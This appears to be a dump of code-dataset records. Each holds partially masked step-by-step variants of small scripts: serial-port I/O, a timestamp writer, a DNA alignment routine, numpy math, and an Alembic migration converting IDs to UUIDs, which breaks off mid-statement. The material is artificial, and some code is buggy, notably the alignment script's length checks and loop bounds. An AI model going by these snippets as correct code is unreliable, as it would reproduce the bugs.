{ "blob_id": "e08fddefabf1b92aa97b939e05bb31d888df4e6a", "index": 2241, "step-1": "<mask token>\n\n\ndef get_comports_list():\n ports = list(lp.comports(include_links=False))\n for p in ports:\n print(p.device)\n return ports\n\n\ndef read_while_LF(com, timeout_ms=500):\n read_data = ''\n delay_ms = 10\n attempts = int(timeout_ms / delay_ms)\n for i in range(attempts):\n byte = com.read(size=1).decode('utf-8')\n time.sleep(0.01)\n read_data += byte\n if byte == '\\n':\n break\n return read_data\n\n\ndef read_write_gst(com, instruction):\n write_data = instruction.encode('utf-8')\n com.write(write_data)\n recieved = []\n while 1:\n read_data = read_while_LF(com)\n if read_data == '':\n break\n recieved.append(read_data)\n return recieved\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_comports_list():\n ports = list(lp.comports(include_links=False))\n for p in ports:\n print(p.device)\n return ports\n\n\ndef read_while_LF(com, timeout_ms=500):\n read_data = ''\n delay_ms = 10\n attempts = int(timeout_ms / delay_ms)\n for i in range(attempts):\n byte = com.read(size=1).decode('utf-8')\n time.sleep(0.01)\n read_data += byte\n if byte == '\\n':\n break\n return read_data\n\n\ndef read_write_gst(com, instruction):\n write_data = instruction.encode('utf-8')\n com.write(write_data)\n recieved = []\n while 1:\n read_data = read_while_LF(com)\n if read_data == '':\n break\n recieved.append(read_data)\n return recieved\n\n\n<mask token>\nprint(s)\ncom.close()\n", "step-3": "<mask token>\n\n\ndef get_comports_list():\n ports = list(lp.comports(include_links=False))\n for p in ports:\n print(p.device)\n return ports\n\n\ndef read_while_LF(com, timeout_ms=500):\n read_data = ''\n delay_ms = 10\n attempts = int(timeout_ms / delay_ms)\n for i in range(attempts):\n byte = com.read(size=1).decode('utf-8')\n time.sleep(0.01)\n read_data += byte\n if byte == '\\n':\n break\n return read_data\n\n\ndef read_write_gst(com, instruction):\n write_data = instruction.encode('utf-8')\n com.write(write_data)\n recieved = []\n while 1:\n read_data = read_while_LF(com)\n if read_data == '':\n break\n recieved.append(read_data)\n return recieved\n\n\ncom = serial.Serial('COM3', baudrate=115200, timeout=0.02)\ns = read_write_gst(com, 'fil_test:start\\r')\nprint(s)\ncom.close()\n", "step-4": "<mask token>\nimport serial\nimport time\nimport serial.tools.list_ports as lp\n\n\ndef get_comports_list():\n ports = list(lp.comports(include_links=False))\n for p in ports:\n print(p.device)\n return ports\n\n\ndef read_while_LF(com, timeout_ms=500):\n read_data = ''\n delay_ms = 10\n attempts = int(timeout_ms / delay_ms)\n for i in range(attempts):\n byte = com.read(size=1).decode('utf-8')\n time.sleep(0.01)\n read_data += byte\n if byte == '\\n':\n break\n return read_data\n\n\ndef read_write_gst(com, instruction):\n write_data = instruction.encode('utf-8')\n com.write(write_data)\n recieved = []\n while 1:\n read_data = read_while_LF(com)\n if read_data == '':\n break\n recieved.append(read_data)\n return recieved\n\n\ncom = serial.Serial('COM3', baudrate=115200, timeout=0.02)\ns = read_write_gst(com, 'fil_test:start\\r')\nprint(s)\ncom.close()\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 19 12:28:39 2020\n\n@author: Ксения\n\"\"\"\n\n\nimport serial\nimport time\nimport serial.tools.list_ports as lp\n\n\ndef get_comports_list():\n ports=list(lp.comports(include_links=False))\n for p in ports:\n print(p.device)\n return ports\n\n\n\ndef read_while_LF(com, timeout_ms=500):\n read_data =\"\"\n delay_ms=10\n attempts=int(timeout_ms/delay_ms)\n for i in range(attempts): \n byte=com.read(size = 1).decode('utf-8')\n time.sleep(0.01)\n read_data+=byte\n if byte == '\\n':\n break\n\n return read_data\n\ndef read_write_gst(com, instruction): \n\n write_data=instruction.encode('utf-8')\n com.write(write_data)\n recieved = []\n while(1):\n read_data=read_while_LF(com)\n if(read_data == \"\"):\n break\n recieved.append(read_data)\n\n return recieved\n\n\ncom = serial.Serial('COM3', baudrate=115200, timeout=0.02)\n\n\n\n\n\ns=read_write_gst(com, \"fil_test:start\\r\")\n\n\nprint(s)\ncom.close()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
import time with open("src/time.txt", "w") as f: f.write(str(int(time.time())))
normal
{ "blob_id": "0058a6d3c9d4e600885b876614362ea4401ce2fe", "index": 1640, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open('src/time.txt', 'w') as f:\n f.write(str(int(time.time())))\n", "step-3": "import time\nwith open('src/time.txt', 'w') as f:\n f.write(str(int(time.time())))\n", "step-4": "import time\n\nwith open(\"src/time.txt\", \"w\") as f:\n f.write(str(int(time.time())))", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/python #import Bio def findLCS(read, cassette, rIndex, cIndex,cassettes): LCS='' while True: if read[rIndex] == cassette[cIndex]: LCS+= read[rIndex] rIndex= rIndex +1 cIndex= cIndex +1 #elif checkLCS(cIndex,cassettes)==True: else: break #print(LCS) return LCS def findMaxLCS(read, cassettes, rIndex, cIndex): #print(read) maxLCS='' #print(len(cassettes)) for i in range (0,len(cassettes)): LCS=findLCS(read, cassettes[i],rIndex, cIndex,cassettes) if len(LCS) > len(maxLCS): maxLCS=LCS rIndex= rIndex+len(maxLCS) cIndex= cIndex+len(maxLCS) return maxLCS ,rIndex ,cIndex def findConsensus(cassettes, cIndex): #print (cassettes) con=[] for i in range(0,len(cassettes[1])-26): holder=[] for j in range(0,len(cassettes)): holder.append(cassettes[j][i]) con.append(holder) con2=[] for k in range (0,len(con)): if con[k].count('G')==16 or (con[k].count('G')==14) : con2.append('g') elif con[k].count('A')==16 or (con[k].count('A')==14): #con[k][1]=='-' con2.append('a') elif con[k].count('C')==16 or (con[k].count('C')==14): con2.append('c') elif con[k].count('T')==16 or (con[k].count('T')==14): con2.append('t') elif con[k].count('-')>=10: con2.append('-') else: con2.append('n') #print(con) #print(con2) return con2[cIndex] def checkGap(LCS, cassettes, cIndex): #print(rIndex) #print(cIndex) #nuc= findConsensus(cassettes, cIndex) #LCS=LCS+ str(nuc) #cIndex=cIndex+1 if findConsensus(cassettes, cIndex)== '-': LCS=LCS+'-' cIndex=cIndex+1 return LCS, cIndex else: return LCS, cIndex #print(rIndex) #elif findConsens #elif (findConsensus(cassettes, cIndex)).isalpha(): def deletenuc(read, cassettes, rIndex, cIndex): if len(findMaxLCS(read, cassettes, rIndex+1, cIndex))>=3: return True else: return False def insertnuc(LCS, read, cassettes, rIndex, cIndex): if len(findMaxLCS(read, cassettes, rIndex, cIndex+1))>=3: return True else: return False #def subsnuc( #def checkgaps( def align(read, cassettes): #print(read) #print('hi') #print(cassettes) rIndex=0 cIndex=0 alignedRead='' LCS='' delrec=[] insertrec=[] substrec=[] #print(read) while rIndex<= len(read): #print(read) #print(len(read)) #print(rIndex) LCS, rIndex, cIndex= findMaxLCS(read, cassettes,rIndex, cIndex) #print(rIndex) #print(cIndex) #print(LCS) LCS, cIndex= checkGap(LCS, cassettes,cIndex) #print(rIndex,cIndex) #print(LCS) #if deletenuc(read, cassettes, rIndex,cIndex)==True: #delrec.append(rIndex) #rIndex= rIndex+1 if len(LCS)<=6 : #print (LCS, rIndex) #print('enter') if insertnuc(LCS, read, cassettes, rIndex, cIndex)==True: #print(True, LCS) insertrec.append(rIndex) nuc= findConsensus(cassettes, cIndex) cIndex=cIndex+1 LCS= LCS+nuc else: LCS, cIndex= checkGap(LCS, cassettes,cIndex) #elif subsnuc(LCS, read, cassettes, rIndex, cIndex)==True: #else: # LCS, cIndex= checkLCS(LCS, cassettes,cIndex) # nuc= findConsensus(cassettes, cIndex) # LCS= LCS+nuc # cIndex=cIndex+1 # rIndex=rIndex+1 alignedRead= alignedRead+ str(LCS) print(alignedRead) return alignedRead def main(): FASTA=input('Enter FASTA file:') reference=input('Enter reference file:') in_file=open(FASTA, 'r') in_file1=open(reference,'r') line_list=[] line_list1=[] for line in in_file: line=line.strip() line_list.append(line) readnames=line_list[::2] #list of the read headers reads=line_list[1::2] #list of sequences only for line1 in in_file1: line1=line1.strip() line_list1.append(line1) cassettes=line_list1[1::2] refnames=line_list1[::2] #for i in cassettes: # print(len(i)) #print(cassettes) #print(reads) A=[] for i in reads: #print(i[0]) alignedRead=align(i,cassettes) A.append(alignedRead) #print(align(i,cassettes)) #out = open("out.txt", "w") #out.write(align(i, cassettes) #out.close() #print(A) #con=findConsensus(0,cassettes) #print(con)
normal
{ "blob_id": "5cec9e82aa994d07e25d8356a8218fc461bb8b4e", "index": 4728, "step-1": "def findLCS(read, cassette, rIndex, cIndex, cassettes):\n LCS = ''\n while True:\n if read[rIndex] == cassette[cIndex]:\n LCS += read[rIndex]\n rIndex = rIndex + 1\n cIndex = cIndex + 1\n else:\n break\n return LCS\n\n\n<mask token>\n\n\ndef checkGap(LCS, cassettes, cIndex):\n if findConsensus(cassettes, cIndex) == '-':\n LCS = LCS + '-'\n cIndex = cIndex + 1\n return LCS, cIndex\n else:\n return LCS, cIndex\n\n\ndef deletenuc(read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex + 1, cIndex)) >= 3:\n return True\n else:\n return False\n\n\n<mask token>\n\n\ndef main():\n FASTA = input('Enter FASTA file:')\n reference = input('Enter reference file:')\n in_file = open(FASTA, 'r')\n in_file1 = open(reference, 'r')\n line_list = []\n line_list1 = []\n for line in in_file:\n line = line.strip()\n line_list.append(line)\n readnames = line_list[::2]\n reads = line_list[1::2]\n for line1 in in_file1:\n line1 = line1.strip()\n line_list1.append(line1)\n cassettes = line_list1[1::2]\n refnames = line_list1[::2]\n A = []\n for i in reads:\n alignedRead = align(i, cassettes)\n A.append(alignedRead)\n", "step-2": "def findLCS(read, cassette, rIndex, cIndex, cassettes):\n LCS = ''\n while True:\n if read[rIndex] == cassette[cIndex]:\n LCS += read[rIndex]\n rIndex = rIndex + 1\n cIndex = cIndex + 1\n else:\n break\n return LCS\n\n\n<mask token>\n\n\ndef checkGap(LCS, cassettes, cIndex):\n if findConsensus(cassettes, cIndex) == '-':\n LCS = LCS + '-'\n cIndex = cIndex + 1\n return LCS, cIndex\n else:\n return LCS, cIndex\n\n\ndef deletenuc(read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex + 1, cIndex)) >= 3:\n return True\n else:\n return False\n\n\ndef insertnuc(LCS, read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex, cIndex + 1)) >= 3:\n return True\n else:\n return False\n\n\n<mask token>\n\n\ndef main():\n FASTA = input('Enter FASTA file:')\n reference = input('Enter reference file:')\n in_file = open(FASTA, 'r')\n in_file1 = open(reference, 'r')\n line_list = []\n line_list1 = []\n for line in in_file:\n line = line.strip()\n line_list.append(line)\n readnames = line_list[::2]\n reads = line_list[1::2]\n for line1 in in_file1:\n line1 = line1.strip()\n line_list1.append(line1)\n cassettes = line_list1[1::2]\n refnames = line_list1[::2]\n A = []\n for i in reads:\n alignedRead = align(i, cassettes)\n A.append(alignedRead)\n", "step-3": "def findLCS(read, cassette, rIndex, cIndex, cassettes):\n LCS = ''\n while True:\n if read[rIndex] == cassette[cIndex]:\n LCS += read[rIndex]\n rIndex = rIndex + 1\n cIndex = cIndex + 1\n else:\n break\n return LCS\n\n\ndef findMaxLCS(read, cassettes, rIndex, cIndex):\n maxLCS = ''\n for i in range(0, len(cassettes)):\n LCS = findLCS(read, cassettes[i], rIndex, cIndex, cassettes)\n if len(LCS) > len(maxLCS):\n maxLCS = LCS\n rIndex = rIndex + len(maxLCS)\n cIndex = cIndex + len(maxLCS)\n return maxLCS, rIndex, cIndex\n\n\n<mask token>\n\n\ndef checkGap(LCS, cassettes, cIndex):\n if findConsensus(cassettes, cIndex) == '-':\n LCS = LCS + '-'\n cIndex = cIndex + 1\n return LCS, cIndex\n else:\n return LCS, cIndex\n\n\ndef deletenuc(read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex + 1, cIndex)) >= 3:\n return True\n else:\n return False\n\n\ndef insertnuc(LCS, read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex, cIndex + 1)) >= 3:\n return True\n else:\n return False\n\n\n<mask token>\n\n\ndef main():\n FASTA = input('Enter FASTA file:')\n reference = input('Enter reference file:')\n in_file = open(FASTA, 'r')\n in_file1 = open(reference, 'r')\n line_list = []\n line_list1 = []\n for line in in_file:\n line = line.strip()\n line_list.append(line)\n readnames = line_list[::2]\n reads = line_list[1::2]\n for line1 in in_file1:\n line1 = line1.strip()\n line_list1.append(line1)\n cassettes = line_list1[1::2]\n refnames = line_list1[::2]\n A = []\n for i in reads:\n alignedRead = align(i, cassettes)\n A.append(alignedRead)\n", "step-4": "def findLCS(read, cassette, rIndex, cIndex, cassettes):\n LCS = ''\n while True:\n if read[rIndex] == cassette[cIndex]:\n LCS += read[rIndex]\n rIndex = rIndex + 1\n cIndex = cIndex + 1\n else:\n break\n return LCS\n\n\ndef findMaxLCS(read, cassettes, rIndex, cIndex):\n maxLCS = ''\n for i in range(0, len(cassettes)):\n LCS = findLCS(read, cassettes[i], rIndex, cIndex, cassettes)\n if len(LCS) > len(maxLCS):\n maxLCS = LCS\n rIndex = rIndex + len(maxLCS)\n cIndex = cIndex + len(maxLCS)\n return maxLCS, rIndex, cIndex\n\n\n<mask token>\n\n\ndef checkGap(LCS, cassettes, cIndex):\n if findConsensus(cassettes, cIndex) == '-':\n LCS = LCS + '-'\n cIndex = cIndex + 1\n return LCS, cIndex\n else:\n return LCS, cIndex\n\n\ndef deletenuc(read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex + 1, cIndex)) >= 3:\n return True\n else:\n return False\n\n\ndef insertnuc(LCS, read, cassettes, rIndex, cIndex):\n if len(findMaxLCS(read, cassettes, rIndex, cIndex + 1)) >= 3:\n return True\n else:\n return False\n\n\ndef align(read, cassettes):\n rIndex = 0\n cIndex = 0\n alignedRead = ''\n LCS = ''\n delrec = []\n insertrec = []\n substrec = []\n while rIndex <= len(read):\n LCS, rIndex, cIndex = findMaxLCS(read, cassettes, rIndex, cIndex)\n LCS, cIndex = checkGap(LCS, cassettes, cIndex)\n if len(LCS) <= 6:\n if insertnuc(LCS, read, cassettes, rIndex, cIndex) == True:\n insertrec.append(rIndex)\n nuc = findConsensus(cassettes, cIndex)\n cIndex = cIndex + 1\n LCS = LCS + nuc\n else:\n LCS, cIndex = checkGap(LCS, cassettes, cIndex)\n alignedRead = alignedRead + str(LCS)\n print(alignedRead)\n return alignedRead\n\n\ndef main():\n FASTA = input('Enter FASTA file:')\n reference = input('Enter reference file:')\n in_file = open(FASTA, 'r')\n in_file1 = open(reference, 'r')\n line_list = []\n line_list1 = []\n for line in in_file:\n line = line.strip()\n line_list.append(line)\n readnames = line_list[::2]\n reads = line_list[1::2]\n for line1 in in_file1:\n line1 = line1.strip()\n line_list1.append(line1)\n cassettes = line_list1[1::2]\n refnames = line_list1[::2]\n A = []\n for i in reads:\n alignedRead = align(i, cassettes)\n A.append(alignedRead)\n", "step-5": "#!/usr/bin/python\n#import Bio\n\n \n\ndef findLCS(read, cassette, rIndex, cIndex,cassettes):\n \n LCS=''\n while True:\n if read[rIndex] == cassette[cIndex]:\n LCS+= read[rIndex]\n rIndex= rIndex +1\n cIndex= cIndex +1\n #elif checkLCS(cIndex,cassettes)==True:\n else:\n break\n\n #print(LCS)\n \n return LCS\n\ndef findMaxLCS(read, cassettes, rIndex, cIndex):\n #print(read)\n maxLCS=''\n #print(len(cassettes))\n for i in range (0,len(cassettes)):\n LCS=findLCS(read, cassettes[i],rIndex, cIndex,cassettes)\n \n if len(LCS) > len(maxLCS):\n \n maxLCS=LCS\n \n \n \n rIndex= rIndex+len(maxLCS)\n cIndex= cIndex+len(maxLCS)\n return maxLCS ,rIndex ,cIndex\n\ndef findConsensus(cassettes, cIndex):\n #print (cassettes)\n con=[]\n for i in range(0,len(cassettes[1])-26):\n holder=[]\n for j in range(0,len(cassettes)):\n holder.append(cassettes[j][i])\n con.append(holder)\n con2=[]\n for k in range (0,len(con)):\n if con[k].count('G')==16 or (con[k].count('G')==14) :\n con2.append('g')\n elif con[k].count('A')==16 or (con[k].count('A')==14): #con[k][1]=='-'\n con2.append('a')\n elif con[k].count('C')==16 or (con[k].count('C')==14):\n con2.append('c')\n elif con[k].count('T')==16 or (con[k].count('T')==14):\n con2.append('t')\n elif con[k].count('-')>=10:\n con2.append('-')\n else:\n con2.append('n')\n #print(con) \n #print(con2)\n\n return con2[cIndex]\n\ndef checkGap(LCS, cassettes, cIndex):\n \n #print(rIndex)\n #print(cIndex)\n\n #nuc= findConsensus(cassettes, cIndex)\n #LCS=LCS+ str(nuc)\n #cIndex=cIndex+1\n \n if findConsensus(cassettes, cIndex)== '-':\n LCS=LCS+'-'\n cIndex=cIndex+1\n return LCS, cIndex\n else:\n return LCS, cIndex\n #print(rIndex)\n #elif findConsens\n \n \n #elif (findConsensus(cassettes, cIndex)).isalpha():\n \n \n \n\ndef deletenuc(read, cassettes, rIndex, cIndex):\n\n if len(findMaxLCS(read, cassettes, rIndex+1, cIndex))>=3:\n \n return True\n else:\n return False\n \ndef insertnuc(LCS, read, cassettes, rIndex, cIndex):\n\n if len(findMaxLCS(read, cassettes, rIndex, cIndex+1))>=3:\n return True\n else:\n return False\n\n#def subsnuc(\n \n\n#def checkgaps(\n\n\ndef align(read, cassettes):\n #print(read)\n #print('hi')\n #print(cassettes)\n rIndex=0\n cIndex=0\n alignedRead=''\n LCS=''\n delrec=[]\n insertrec=[]\n substrec=[]\n \n #print(read)\n while rIndex<= len(read):\n #print(read)\n \n #print(len(read))\n #print(rIndex)\n LCS, rIndex, cIndex= findMaxLCS(read, cassettes,rIndex, cIndex)\n #print(rIndex)\n #print(cIndex)\n #print(LCS)\n LCS, cIndex= checkGap(LCS, cassettes,cIndex)\n \n #print(rIndex,cIndex)\n #print(LCS) \n \n #if deletenuc(read, cassettes, rIndex,cIndex)==True:\n #delrec.append(rIndex)\n #rIndex= rIndex+1\n if len(LCS)<=6 :\n #print (LCS, rIndex)\n #print('enter')\n if insertnuc(LCS, read, cassettes, rIndex, cIndex)==True:\n #print(True, LCS)\n insertrec.append(rIndex)\n nuc= findConsensus(cassettes, cIndex)\n cIndex=cIndex+1\n LCS= LCS+nuc\n else:\n LCS, cIndex= checkGap(LCS, cassettes,cIndex)\n \n #elif subsnuc(LCS, read, cassettes, rIndex, cIndex)==True:\n \n\n \n #else:\n # LCS, cIndex= checkLCS(LCS, cassettes,cIndex)\n\n \n \n\n \n # nuc= findConsensus(cassettes, cIndex)\n # LCS= LCS+nuc\n # cIndex=cIndex+1\n # rIndex=rIndex+1\n \n alignedRead= alignedRead+ str(LCS)\n print(alignedRead)\n \n return alignedRead\n\ndef main():\n FASTA=input('Enter FASTA file:')\n reference=input('Enter reference file:')\n in_file=open(FASTA, 'r')\n in_file1=open(reference,'r')\n\n\n line_list=[] \n line_list1=[]\n\n\n\n for line in in_file:\n line=line.strip()\n line_list.append(line)\n readnames=line_list[::2] #list of the read headers\n reads=line_list[1::2] #list of sequences only\n\n for line1 in in_file1:\n line1=line1.strip()\n line_list1.append(line1) \n cassettes=line_list1[1::2]\n refnames=line_list1[::2]\n\n #for i in cassettes:\n # print(len(i))\n #print(cassettes)\n #print(reads)\n A=[]\n for i in reads:\n #print(i[0])\n alignedRead=align(i,cassettes)\n A.append(alignedRead)\n #print(align(i,cassettes))\n #out = open(\"out.txt\", \"w\")\n #out.write(align(i, cassettes)\n #out.close()\n \n #print(A)\n #con=findConsensus(0,cassettes)\n #print(con)\n", "step-ids": [ 4, 5, 6, 7, 9 ] }
[ 4, 5, 6, 7, 9 ]
def longest(s1, s2): # your code s=s1+s2 st="".join(sorted(set(s))) return st longest("xyaabbbccccdefww","xxxxyyyyabklmopq")
normal
{ "blob_id": "7d54d5fd855c7c03d2d4739e8ad4f9ab8772ca2b", "index": 3977, "step-1": "<mask token>\n", "step-2": "def longest(s1, s2):\n s = s1 + s2\n st = ''.join(sorted(set(s)))\n return st\n\n\n<mask token>\n", "step-3": "def longest(s1, s2):\n s = s1 + s2\n st = ''.join(sorted(set(s)))\n return st\n\n\nlongest('xyaabbbccccdefww', 'xxxxyyyyabklmopq')\n", "step-4": "def longest(s1, s2):\n # your code\n s=s1+s2\n st=\"\".join(sorted(set(s))) \n return st\n \n \nlongest(\"xyaabbbccccdefww\",\"xxxxyyyyabklmopq\")\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np n = int(input()) a = [list(map(int, input().split())) for _ in range(n)] b = [list(map(int, input().split())) for _ in range(n)] a = np.array(a) b = np.array(b) print(np.dot(a, b))
normal
{ "blob_id": "17b8fec5583f2544bd02a2409528082fa1dc2a1e", "index": 4107, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(np.dot(a, b))\n", "step-3": "<mask token>\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\nb = [list(map(int, input().split())) for _ in range(n)]\na = np.array(a)\nb = np.array(b)\nprint(np.dot(a, b))\n", "step-4": "import numpy as np\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\nb = [list(map(int, input().split())) for _ in range(n)]\na = np.array(a)\nb = np.array(b)\nprint(np.dot(a, b))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# # Copyright (C) 2017 Red Hat, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Change varchar ID to UUID Revision ID: 1bb42ff54435 Revises: 6bbbf58ed9de Create Date: 2017-02-07 09:28:37.493302 """ # revision identifiers, used by Alembic. revision = '1bb42ff54435' down_revision = '6bbbf58ed9de' branch_labels = None depends_on = None from alembic import op def upgrade(): # Drop constraint op.drop_constraint('component_files_component_id_fkey', 'component_files') op.drop_constraint('components_topic_id_fkey', 'components') op.drop_constraint('files_job_id_fkey', 'files') op.drop_constraint('files_jobstate_id_fkey', 'files') op.drop_constraint('files_team_id_fkey', 'files') op.drop_constraint('files_test_id_fkey', 'files') op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey', 'jobdefinition_tests') op.drop_constraint('jobdefinition_tests_test_id_fkey', 'jobdefinition_tests') op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions') op.drop_constraint('jobs_team_id_fkey', 'jobs') op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs') op.drop_constraint('jobs_remoteci_id_fkey', 'jobs') op.drop_constraint('jobs_previous_job_id_fkey', 'jobs') op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components') op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components') op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues') op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues') op.drop_constraint('jobstates_team_id_fkey', 'jobstates') op.drop_constraint('jobstates_job_id_fkey', 'jobstates') op.drop_constraint('logs_team_id_fkey', 'logs') op.drop_constraint('logs_user_id_fkey', 'logs') op.drop_constraint('metas_job_id_fkey', 'metas') op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests') op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests') op.drop_constraint('remotecis_team_id_fkey', 'remotecis') op.drop_constraint('tests_team_id_fkey', 'tests') op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests') op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests') op.drop_constraint('topics_next_topic_fkey', 'topics') op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams') op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams') op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis') op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis') op.drop_constraint('users_team_id_fkey', 'users') # Change type # Table component_files op.execute("ALTER TABLE component_files ALTER COLUMN component_id TYPE \ UUID USING component_id::uuid") op.execute("ALTER TABLE component_files ALTER COLUMN id TYPE \ UUID USING id::uuid") # Table components op.execute("ALTER TABLE components ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE components ALTER COLUMN topic_id TYPE \ UUID USING topic_id::uuid") # Table files op.execute("ALTER TABLE files ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE files ALTER COLUMN jobstate_id TYPE \ UUID USING jobstate_id::uuid") op.execute("ALTER TABLE files ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") op.execute("ALTER TABLE files ALTER COLUMN job_id TYPE \ UUID USING job_id::uuid") op.execute("ALTER TABLE files ALTER COLUMN test_id TYPE \ UUID USING test_id::uuid") # Table issues op.execute("ALTER TABLE issues ALTER COLUMN id TYPE \ UUID USING id::uuid") # Table jobdefinition_tests op.execute("ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id \ TYPE UUID USING jobdefinition_id::uuid") op.execute("ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE \ UUID USING test_id::uuid") # Table jobdefinitions op.execute("ALTER TABLE jobdefinitions ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE \ UUID USING topic_id::uuid") # Table jobs op.execute("ALTER TABLE jobs ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE \ UUID USING jobdefinition_id::uuid") op.execute("ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE \ UUID USING remoteci_id::uuid") op.execute("ALTER TABLE jobs ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") op.execute("ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE \ UUID USING previous_job_id::uuid") # Table jobs_components op.execute("ALTER TABLE jobs_components ALTER COLUMN component_id TYPE \ UUID USING component_id::uuid") op.execute("ALTER TABLE jobs_components ALTER COLUMN job_id TYPE \ UUID USING job_id::uuid") # Table jobs_issues op.execute("ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE \ UUID USING job_id::uuid") op.execute("ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE \ UUID USING issue_id::uuid") # Table jobstates op.execute("ALTER TABLE jobstates ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE jobstates ALTER COLUMN job_id TYPE \ UUID USING job_id::uuid") op.execute("ALTER TABLE jobstates ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Table logs op.execute("ALTER TABLE logs ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE logs ALTER COLUMN user_id TYPE \ UUID USING user_id::uuid") op.execute("ALTER TABLE logs ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Table metas op.execute("ALTER TABLE metas ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE metas ALTER COLUMN job_id TYPE \ UUID USING job_id::uuid") # Table remoteci_tests op.execute("ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE \ UUID USING remoteci_id::uuid") op.execute("ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE \ UUID USING test_id::uuid") # Table remotecis op.execute("ALTER TABLE remotecis ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE remotecis ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Table teams op.execute("ALTER TABLE teams ALTER COLUMN id TYPE \ UUID USING id::uuid") # Table tests op.execute("ALTER TABLE tests ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE tests ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Table topic_tests op.execute("ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE \ UUID USING topic_id::uuid") op.execute("ALTER TABLE topic_tests ALTER COLUMN test_id TYPE \ UUID USING test_id::uuid") # Table topics op.execute("ALTER TABLE topics ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE topics ALTER COLUMN next_topic TYPE \ UUID USING next_topic::uuid") # Table topics_teams op.execute("ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE \ UUID USING topic_id::uuid") op.execute("ALTER TABLE topics_teams ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Table user_remotecis op.execute("ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE \ UUID USING user_id::uuid") op.execute("ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE \ UUID USING remoteci_id::uuid") # Table users op.execute("ALTER TABLE users ALTER COLUMN id TYPE \ UUID USING id::uuid") op.execute("ALTER TABLE users ALTER COLUMN team_id TYPE \ UUID USING team_id::uuid") # Re-Create constraint op.create_foreign_key('component_files_component_id_fkey', 'component_files', 'components', ['component_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('components_topic_id_fkey', 'components', 'topics', ['topic_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('files_job_id_fkey', 'files', 'jobs', ['job_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('files_jobstate_id_fkey', 'files', 'jobstates', ['jobstate_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('files_team_id_fkey', 'files', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('files_test_id_fkey', 'files', 'tests', ['test_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey', 'jobdefinition_tests', 'jobdefinitions', ['jobdefinition_id'], 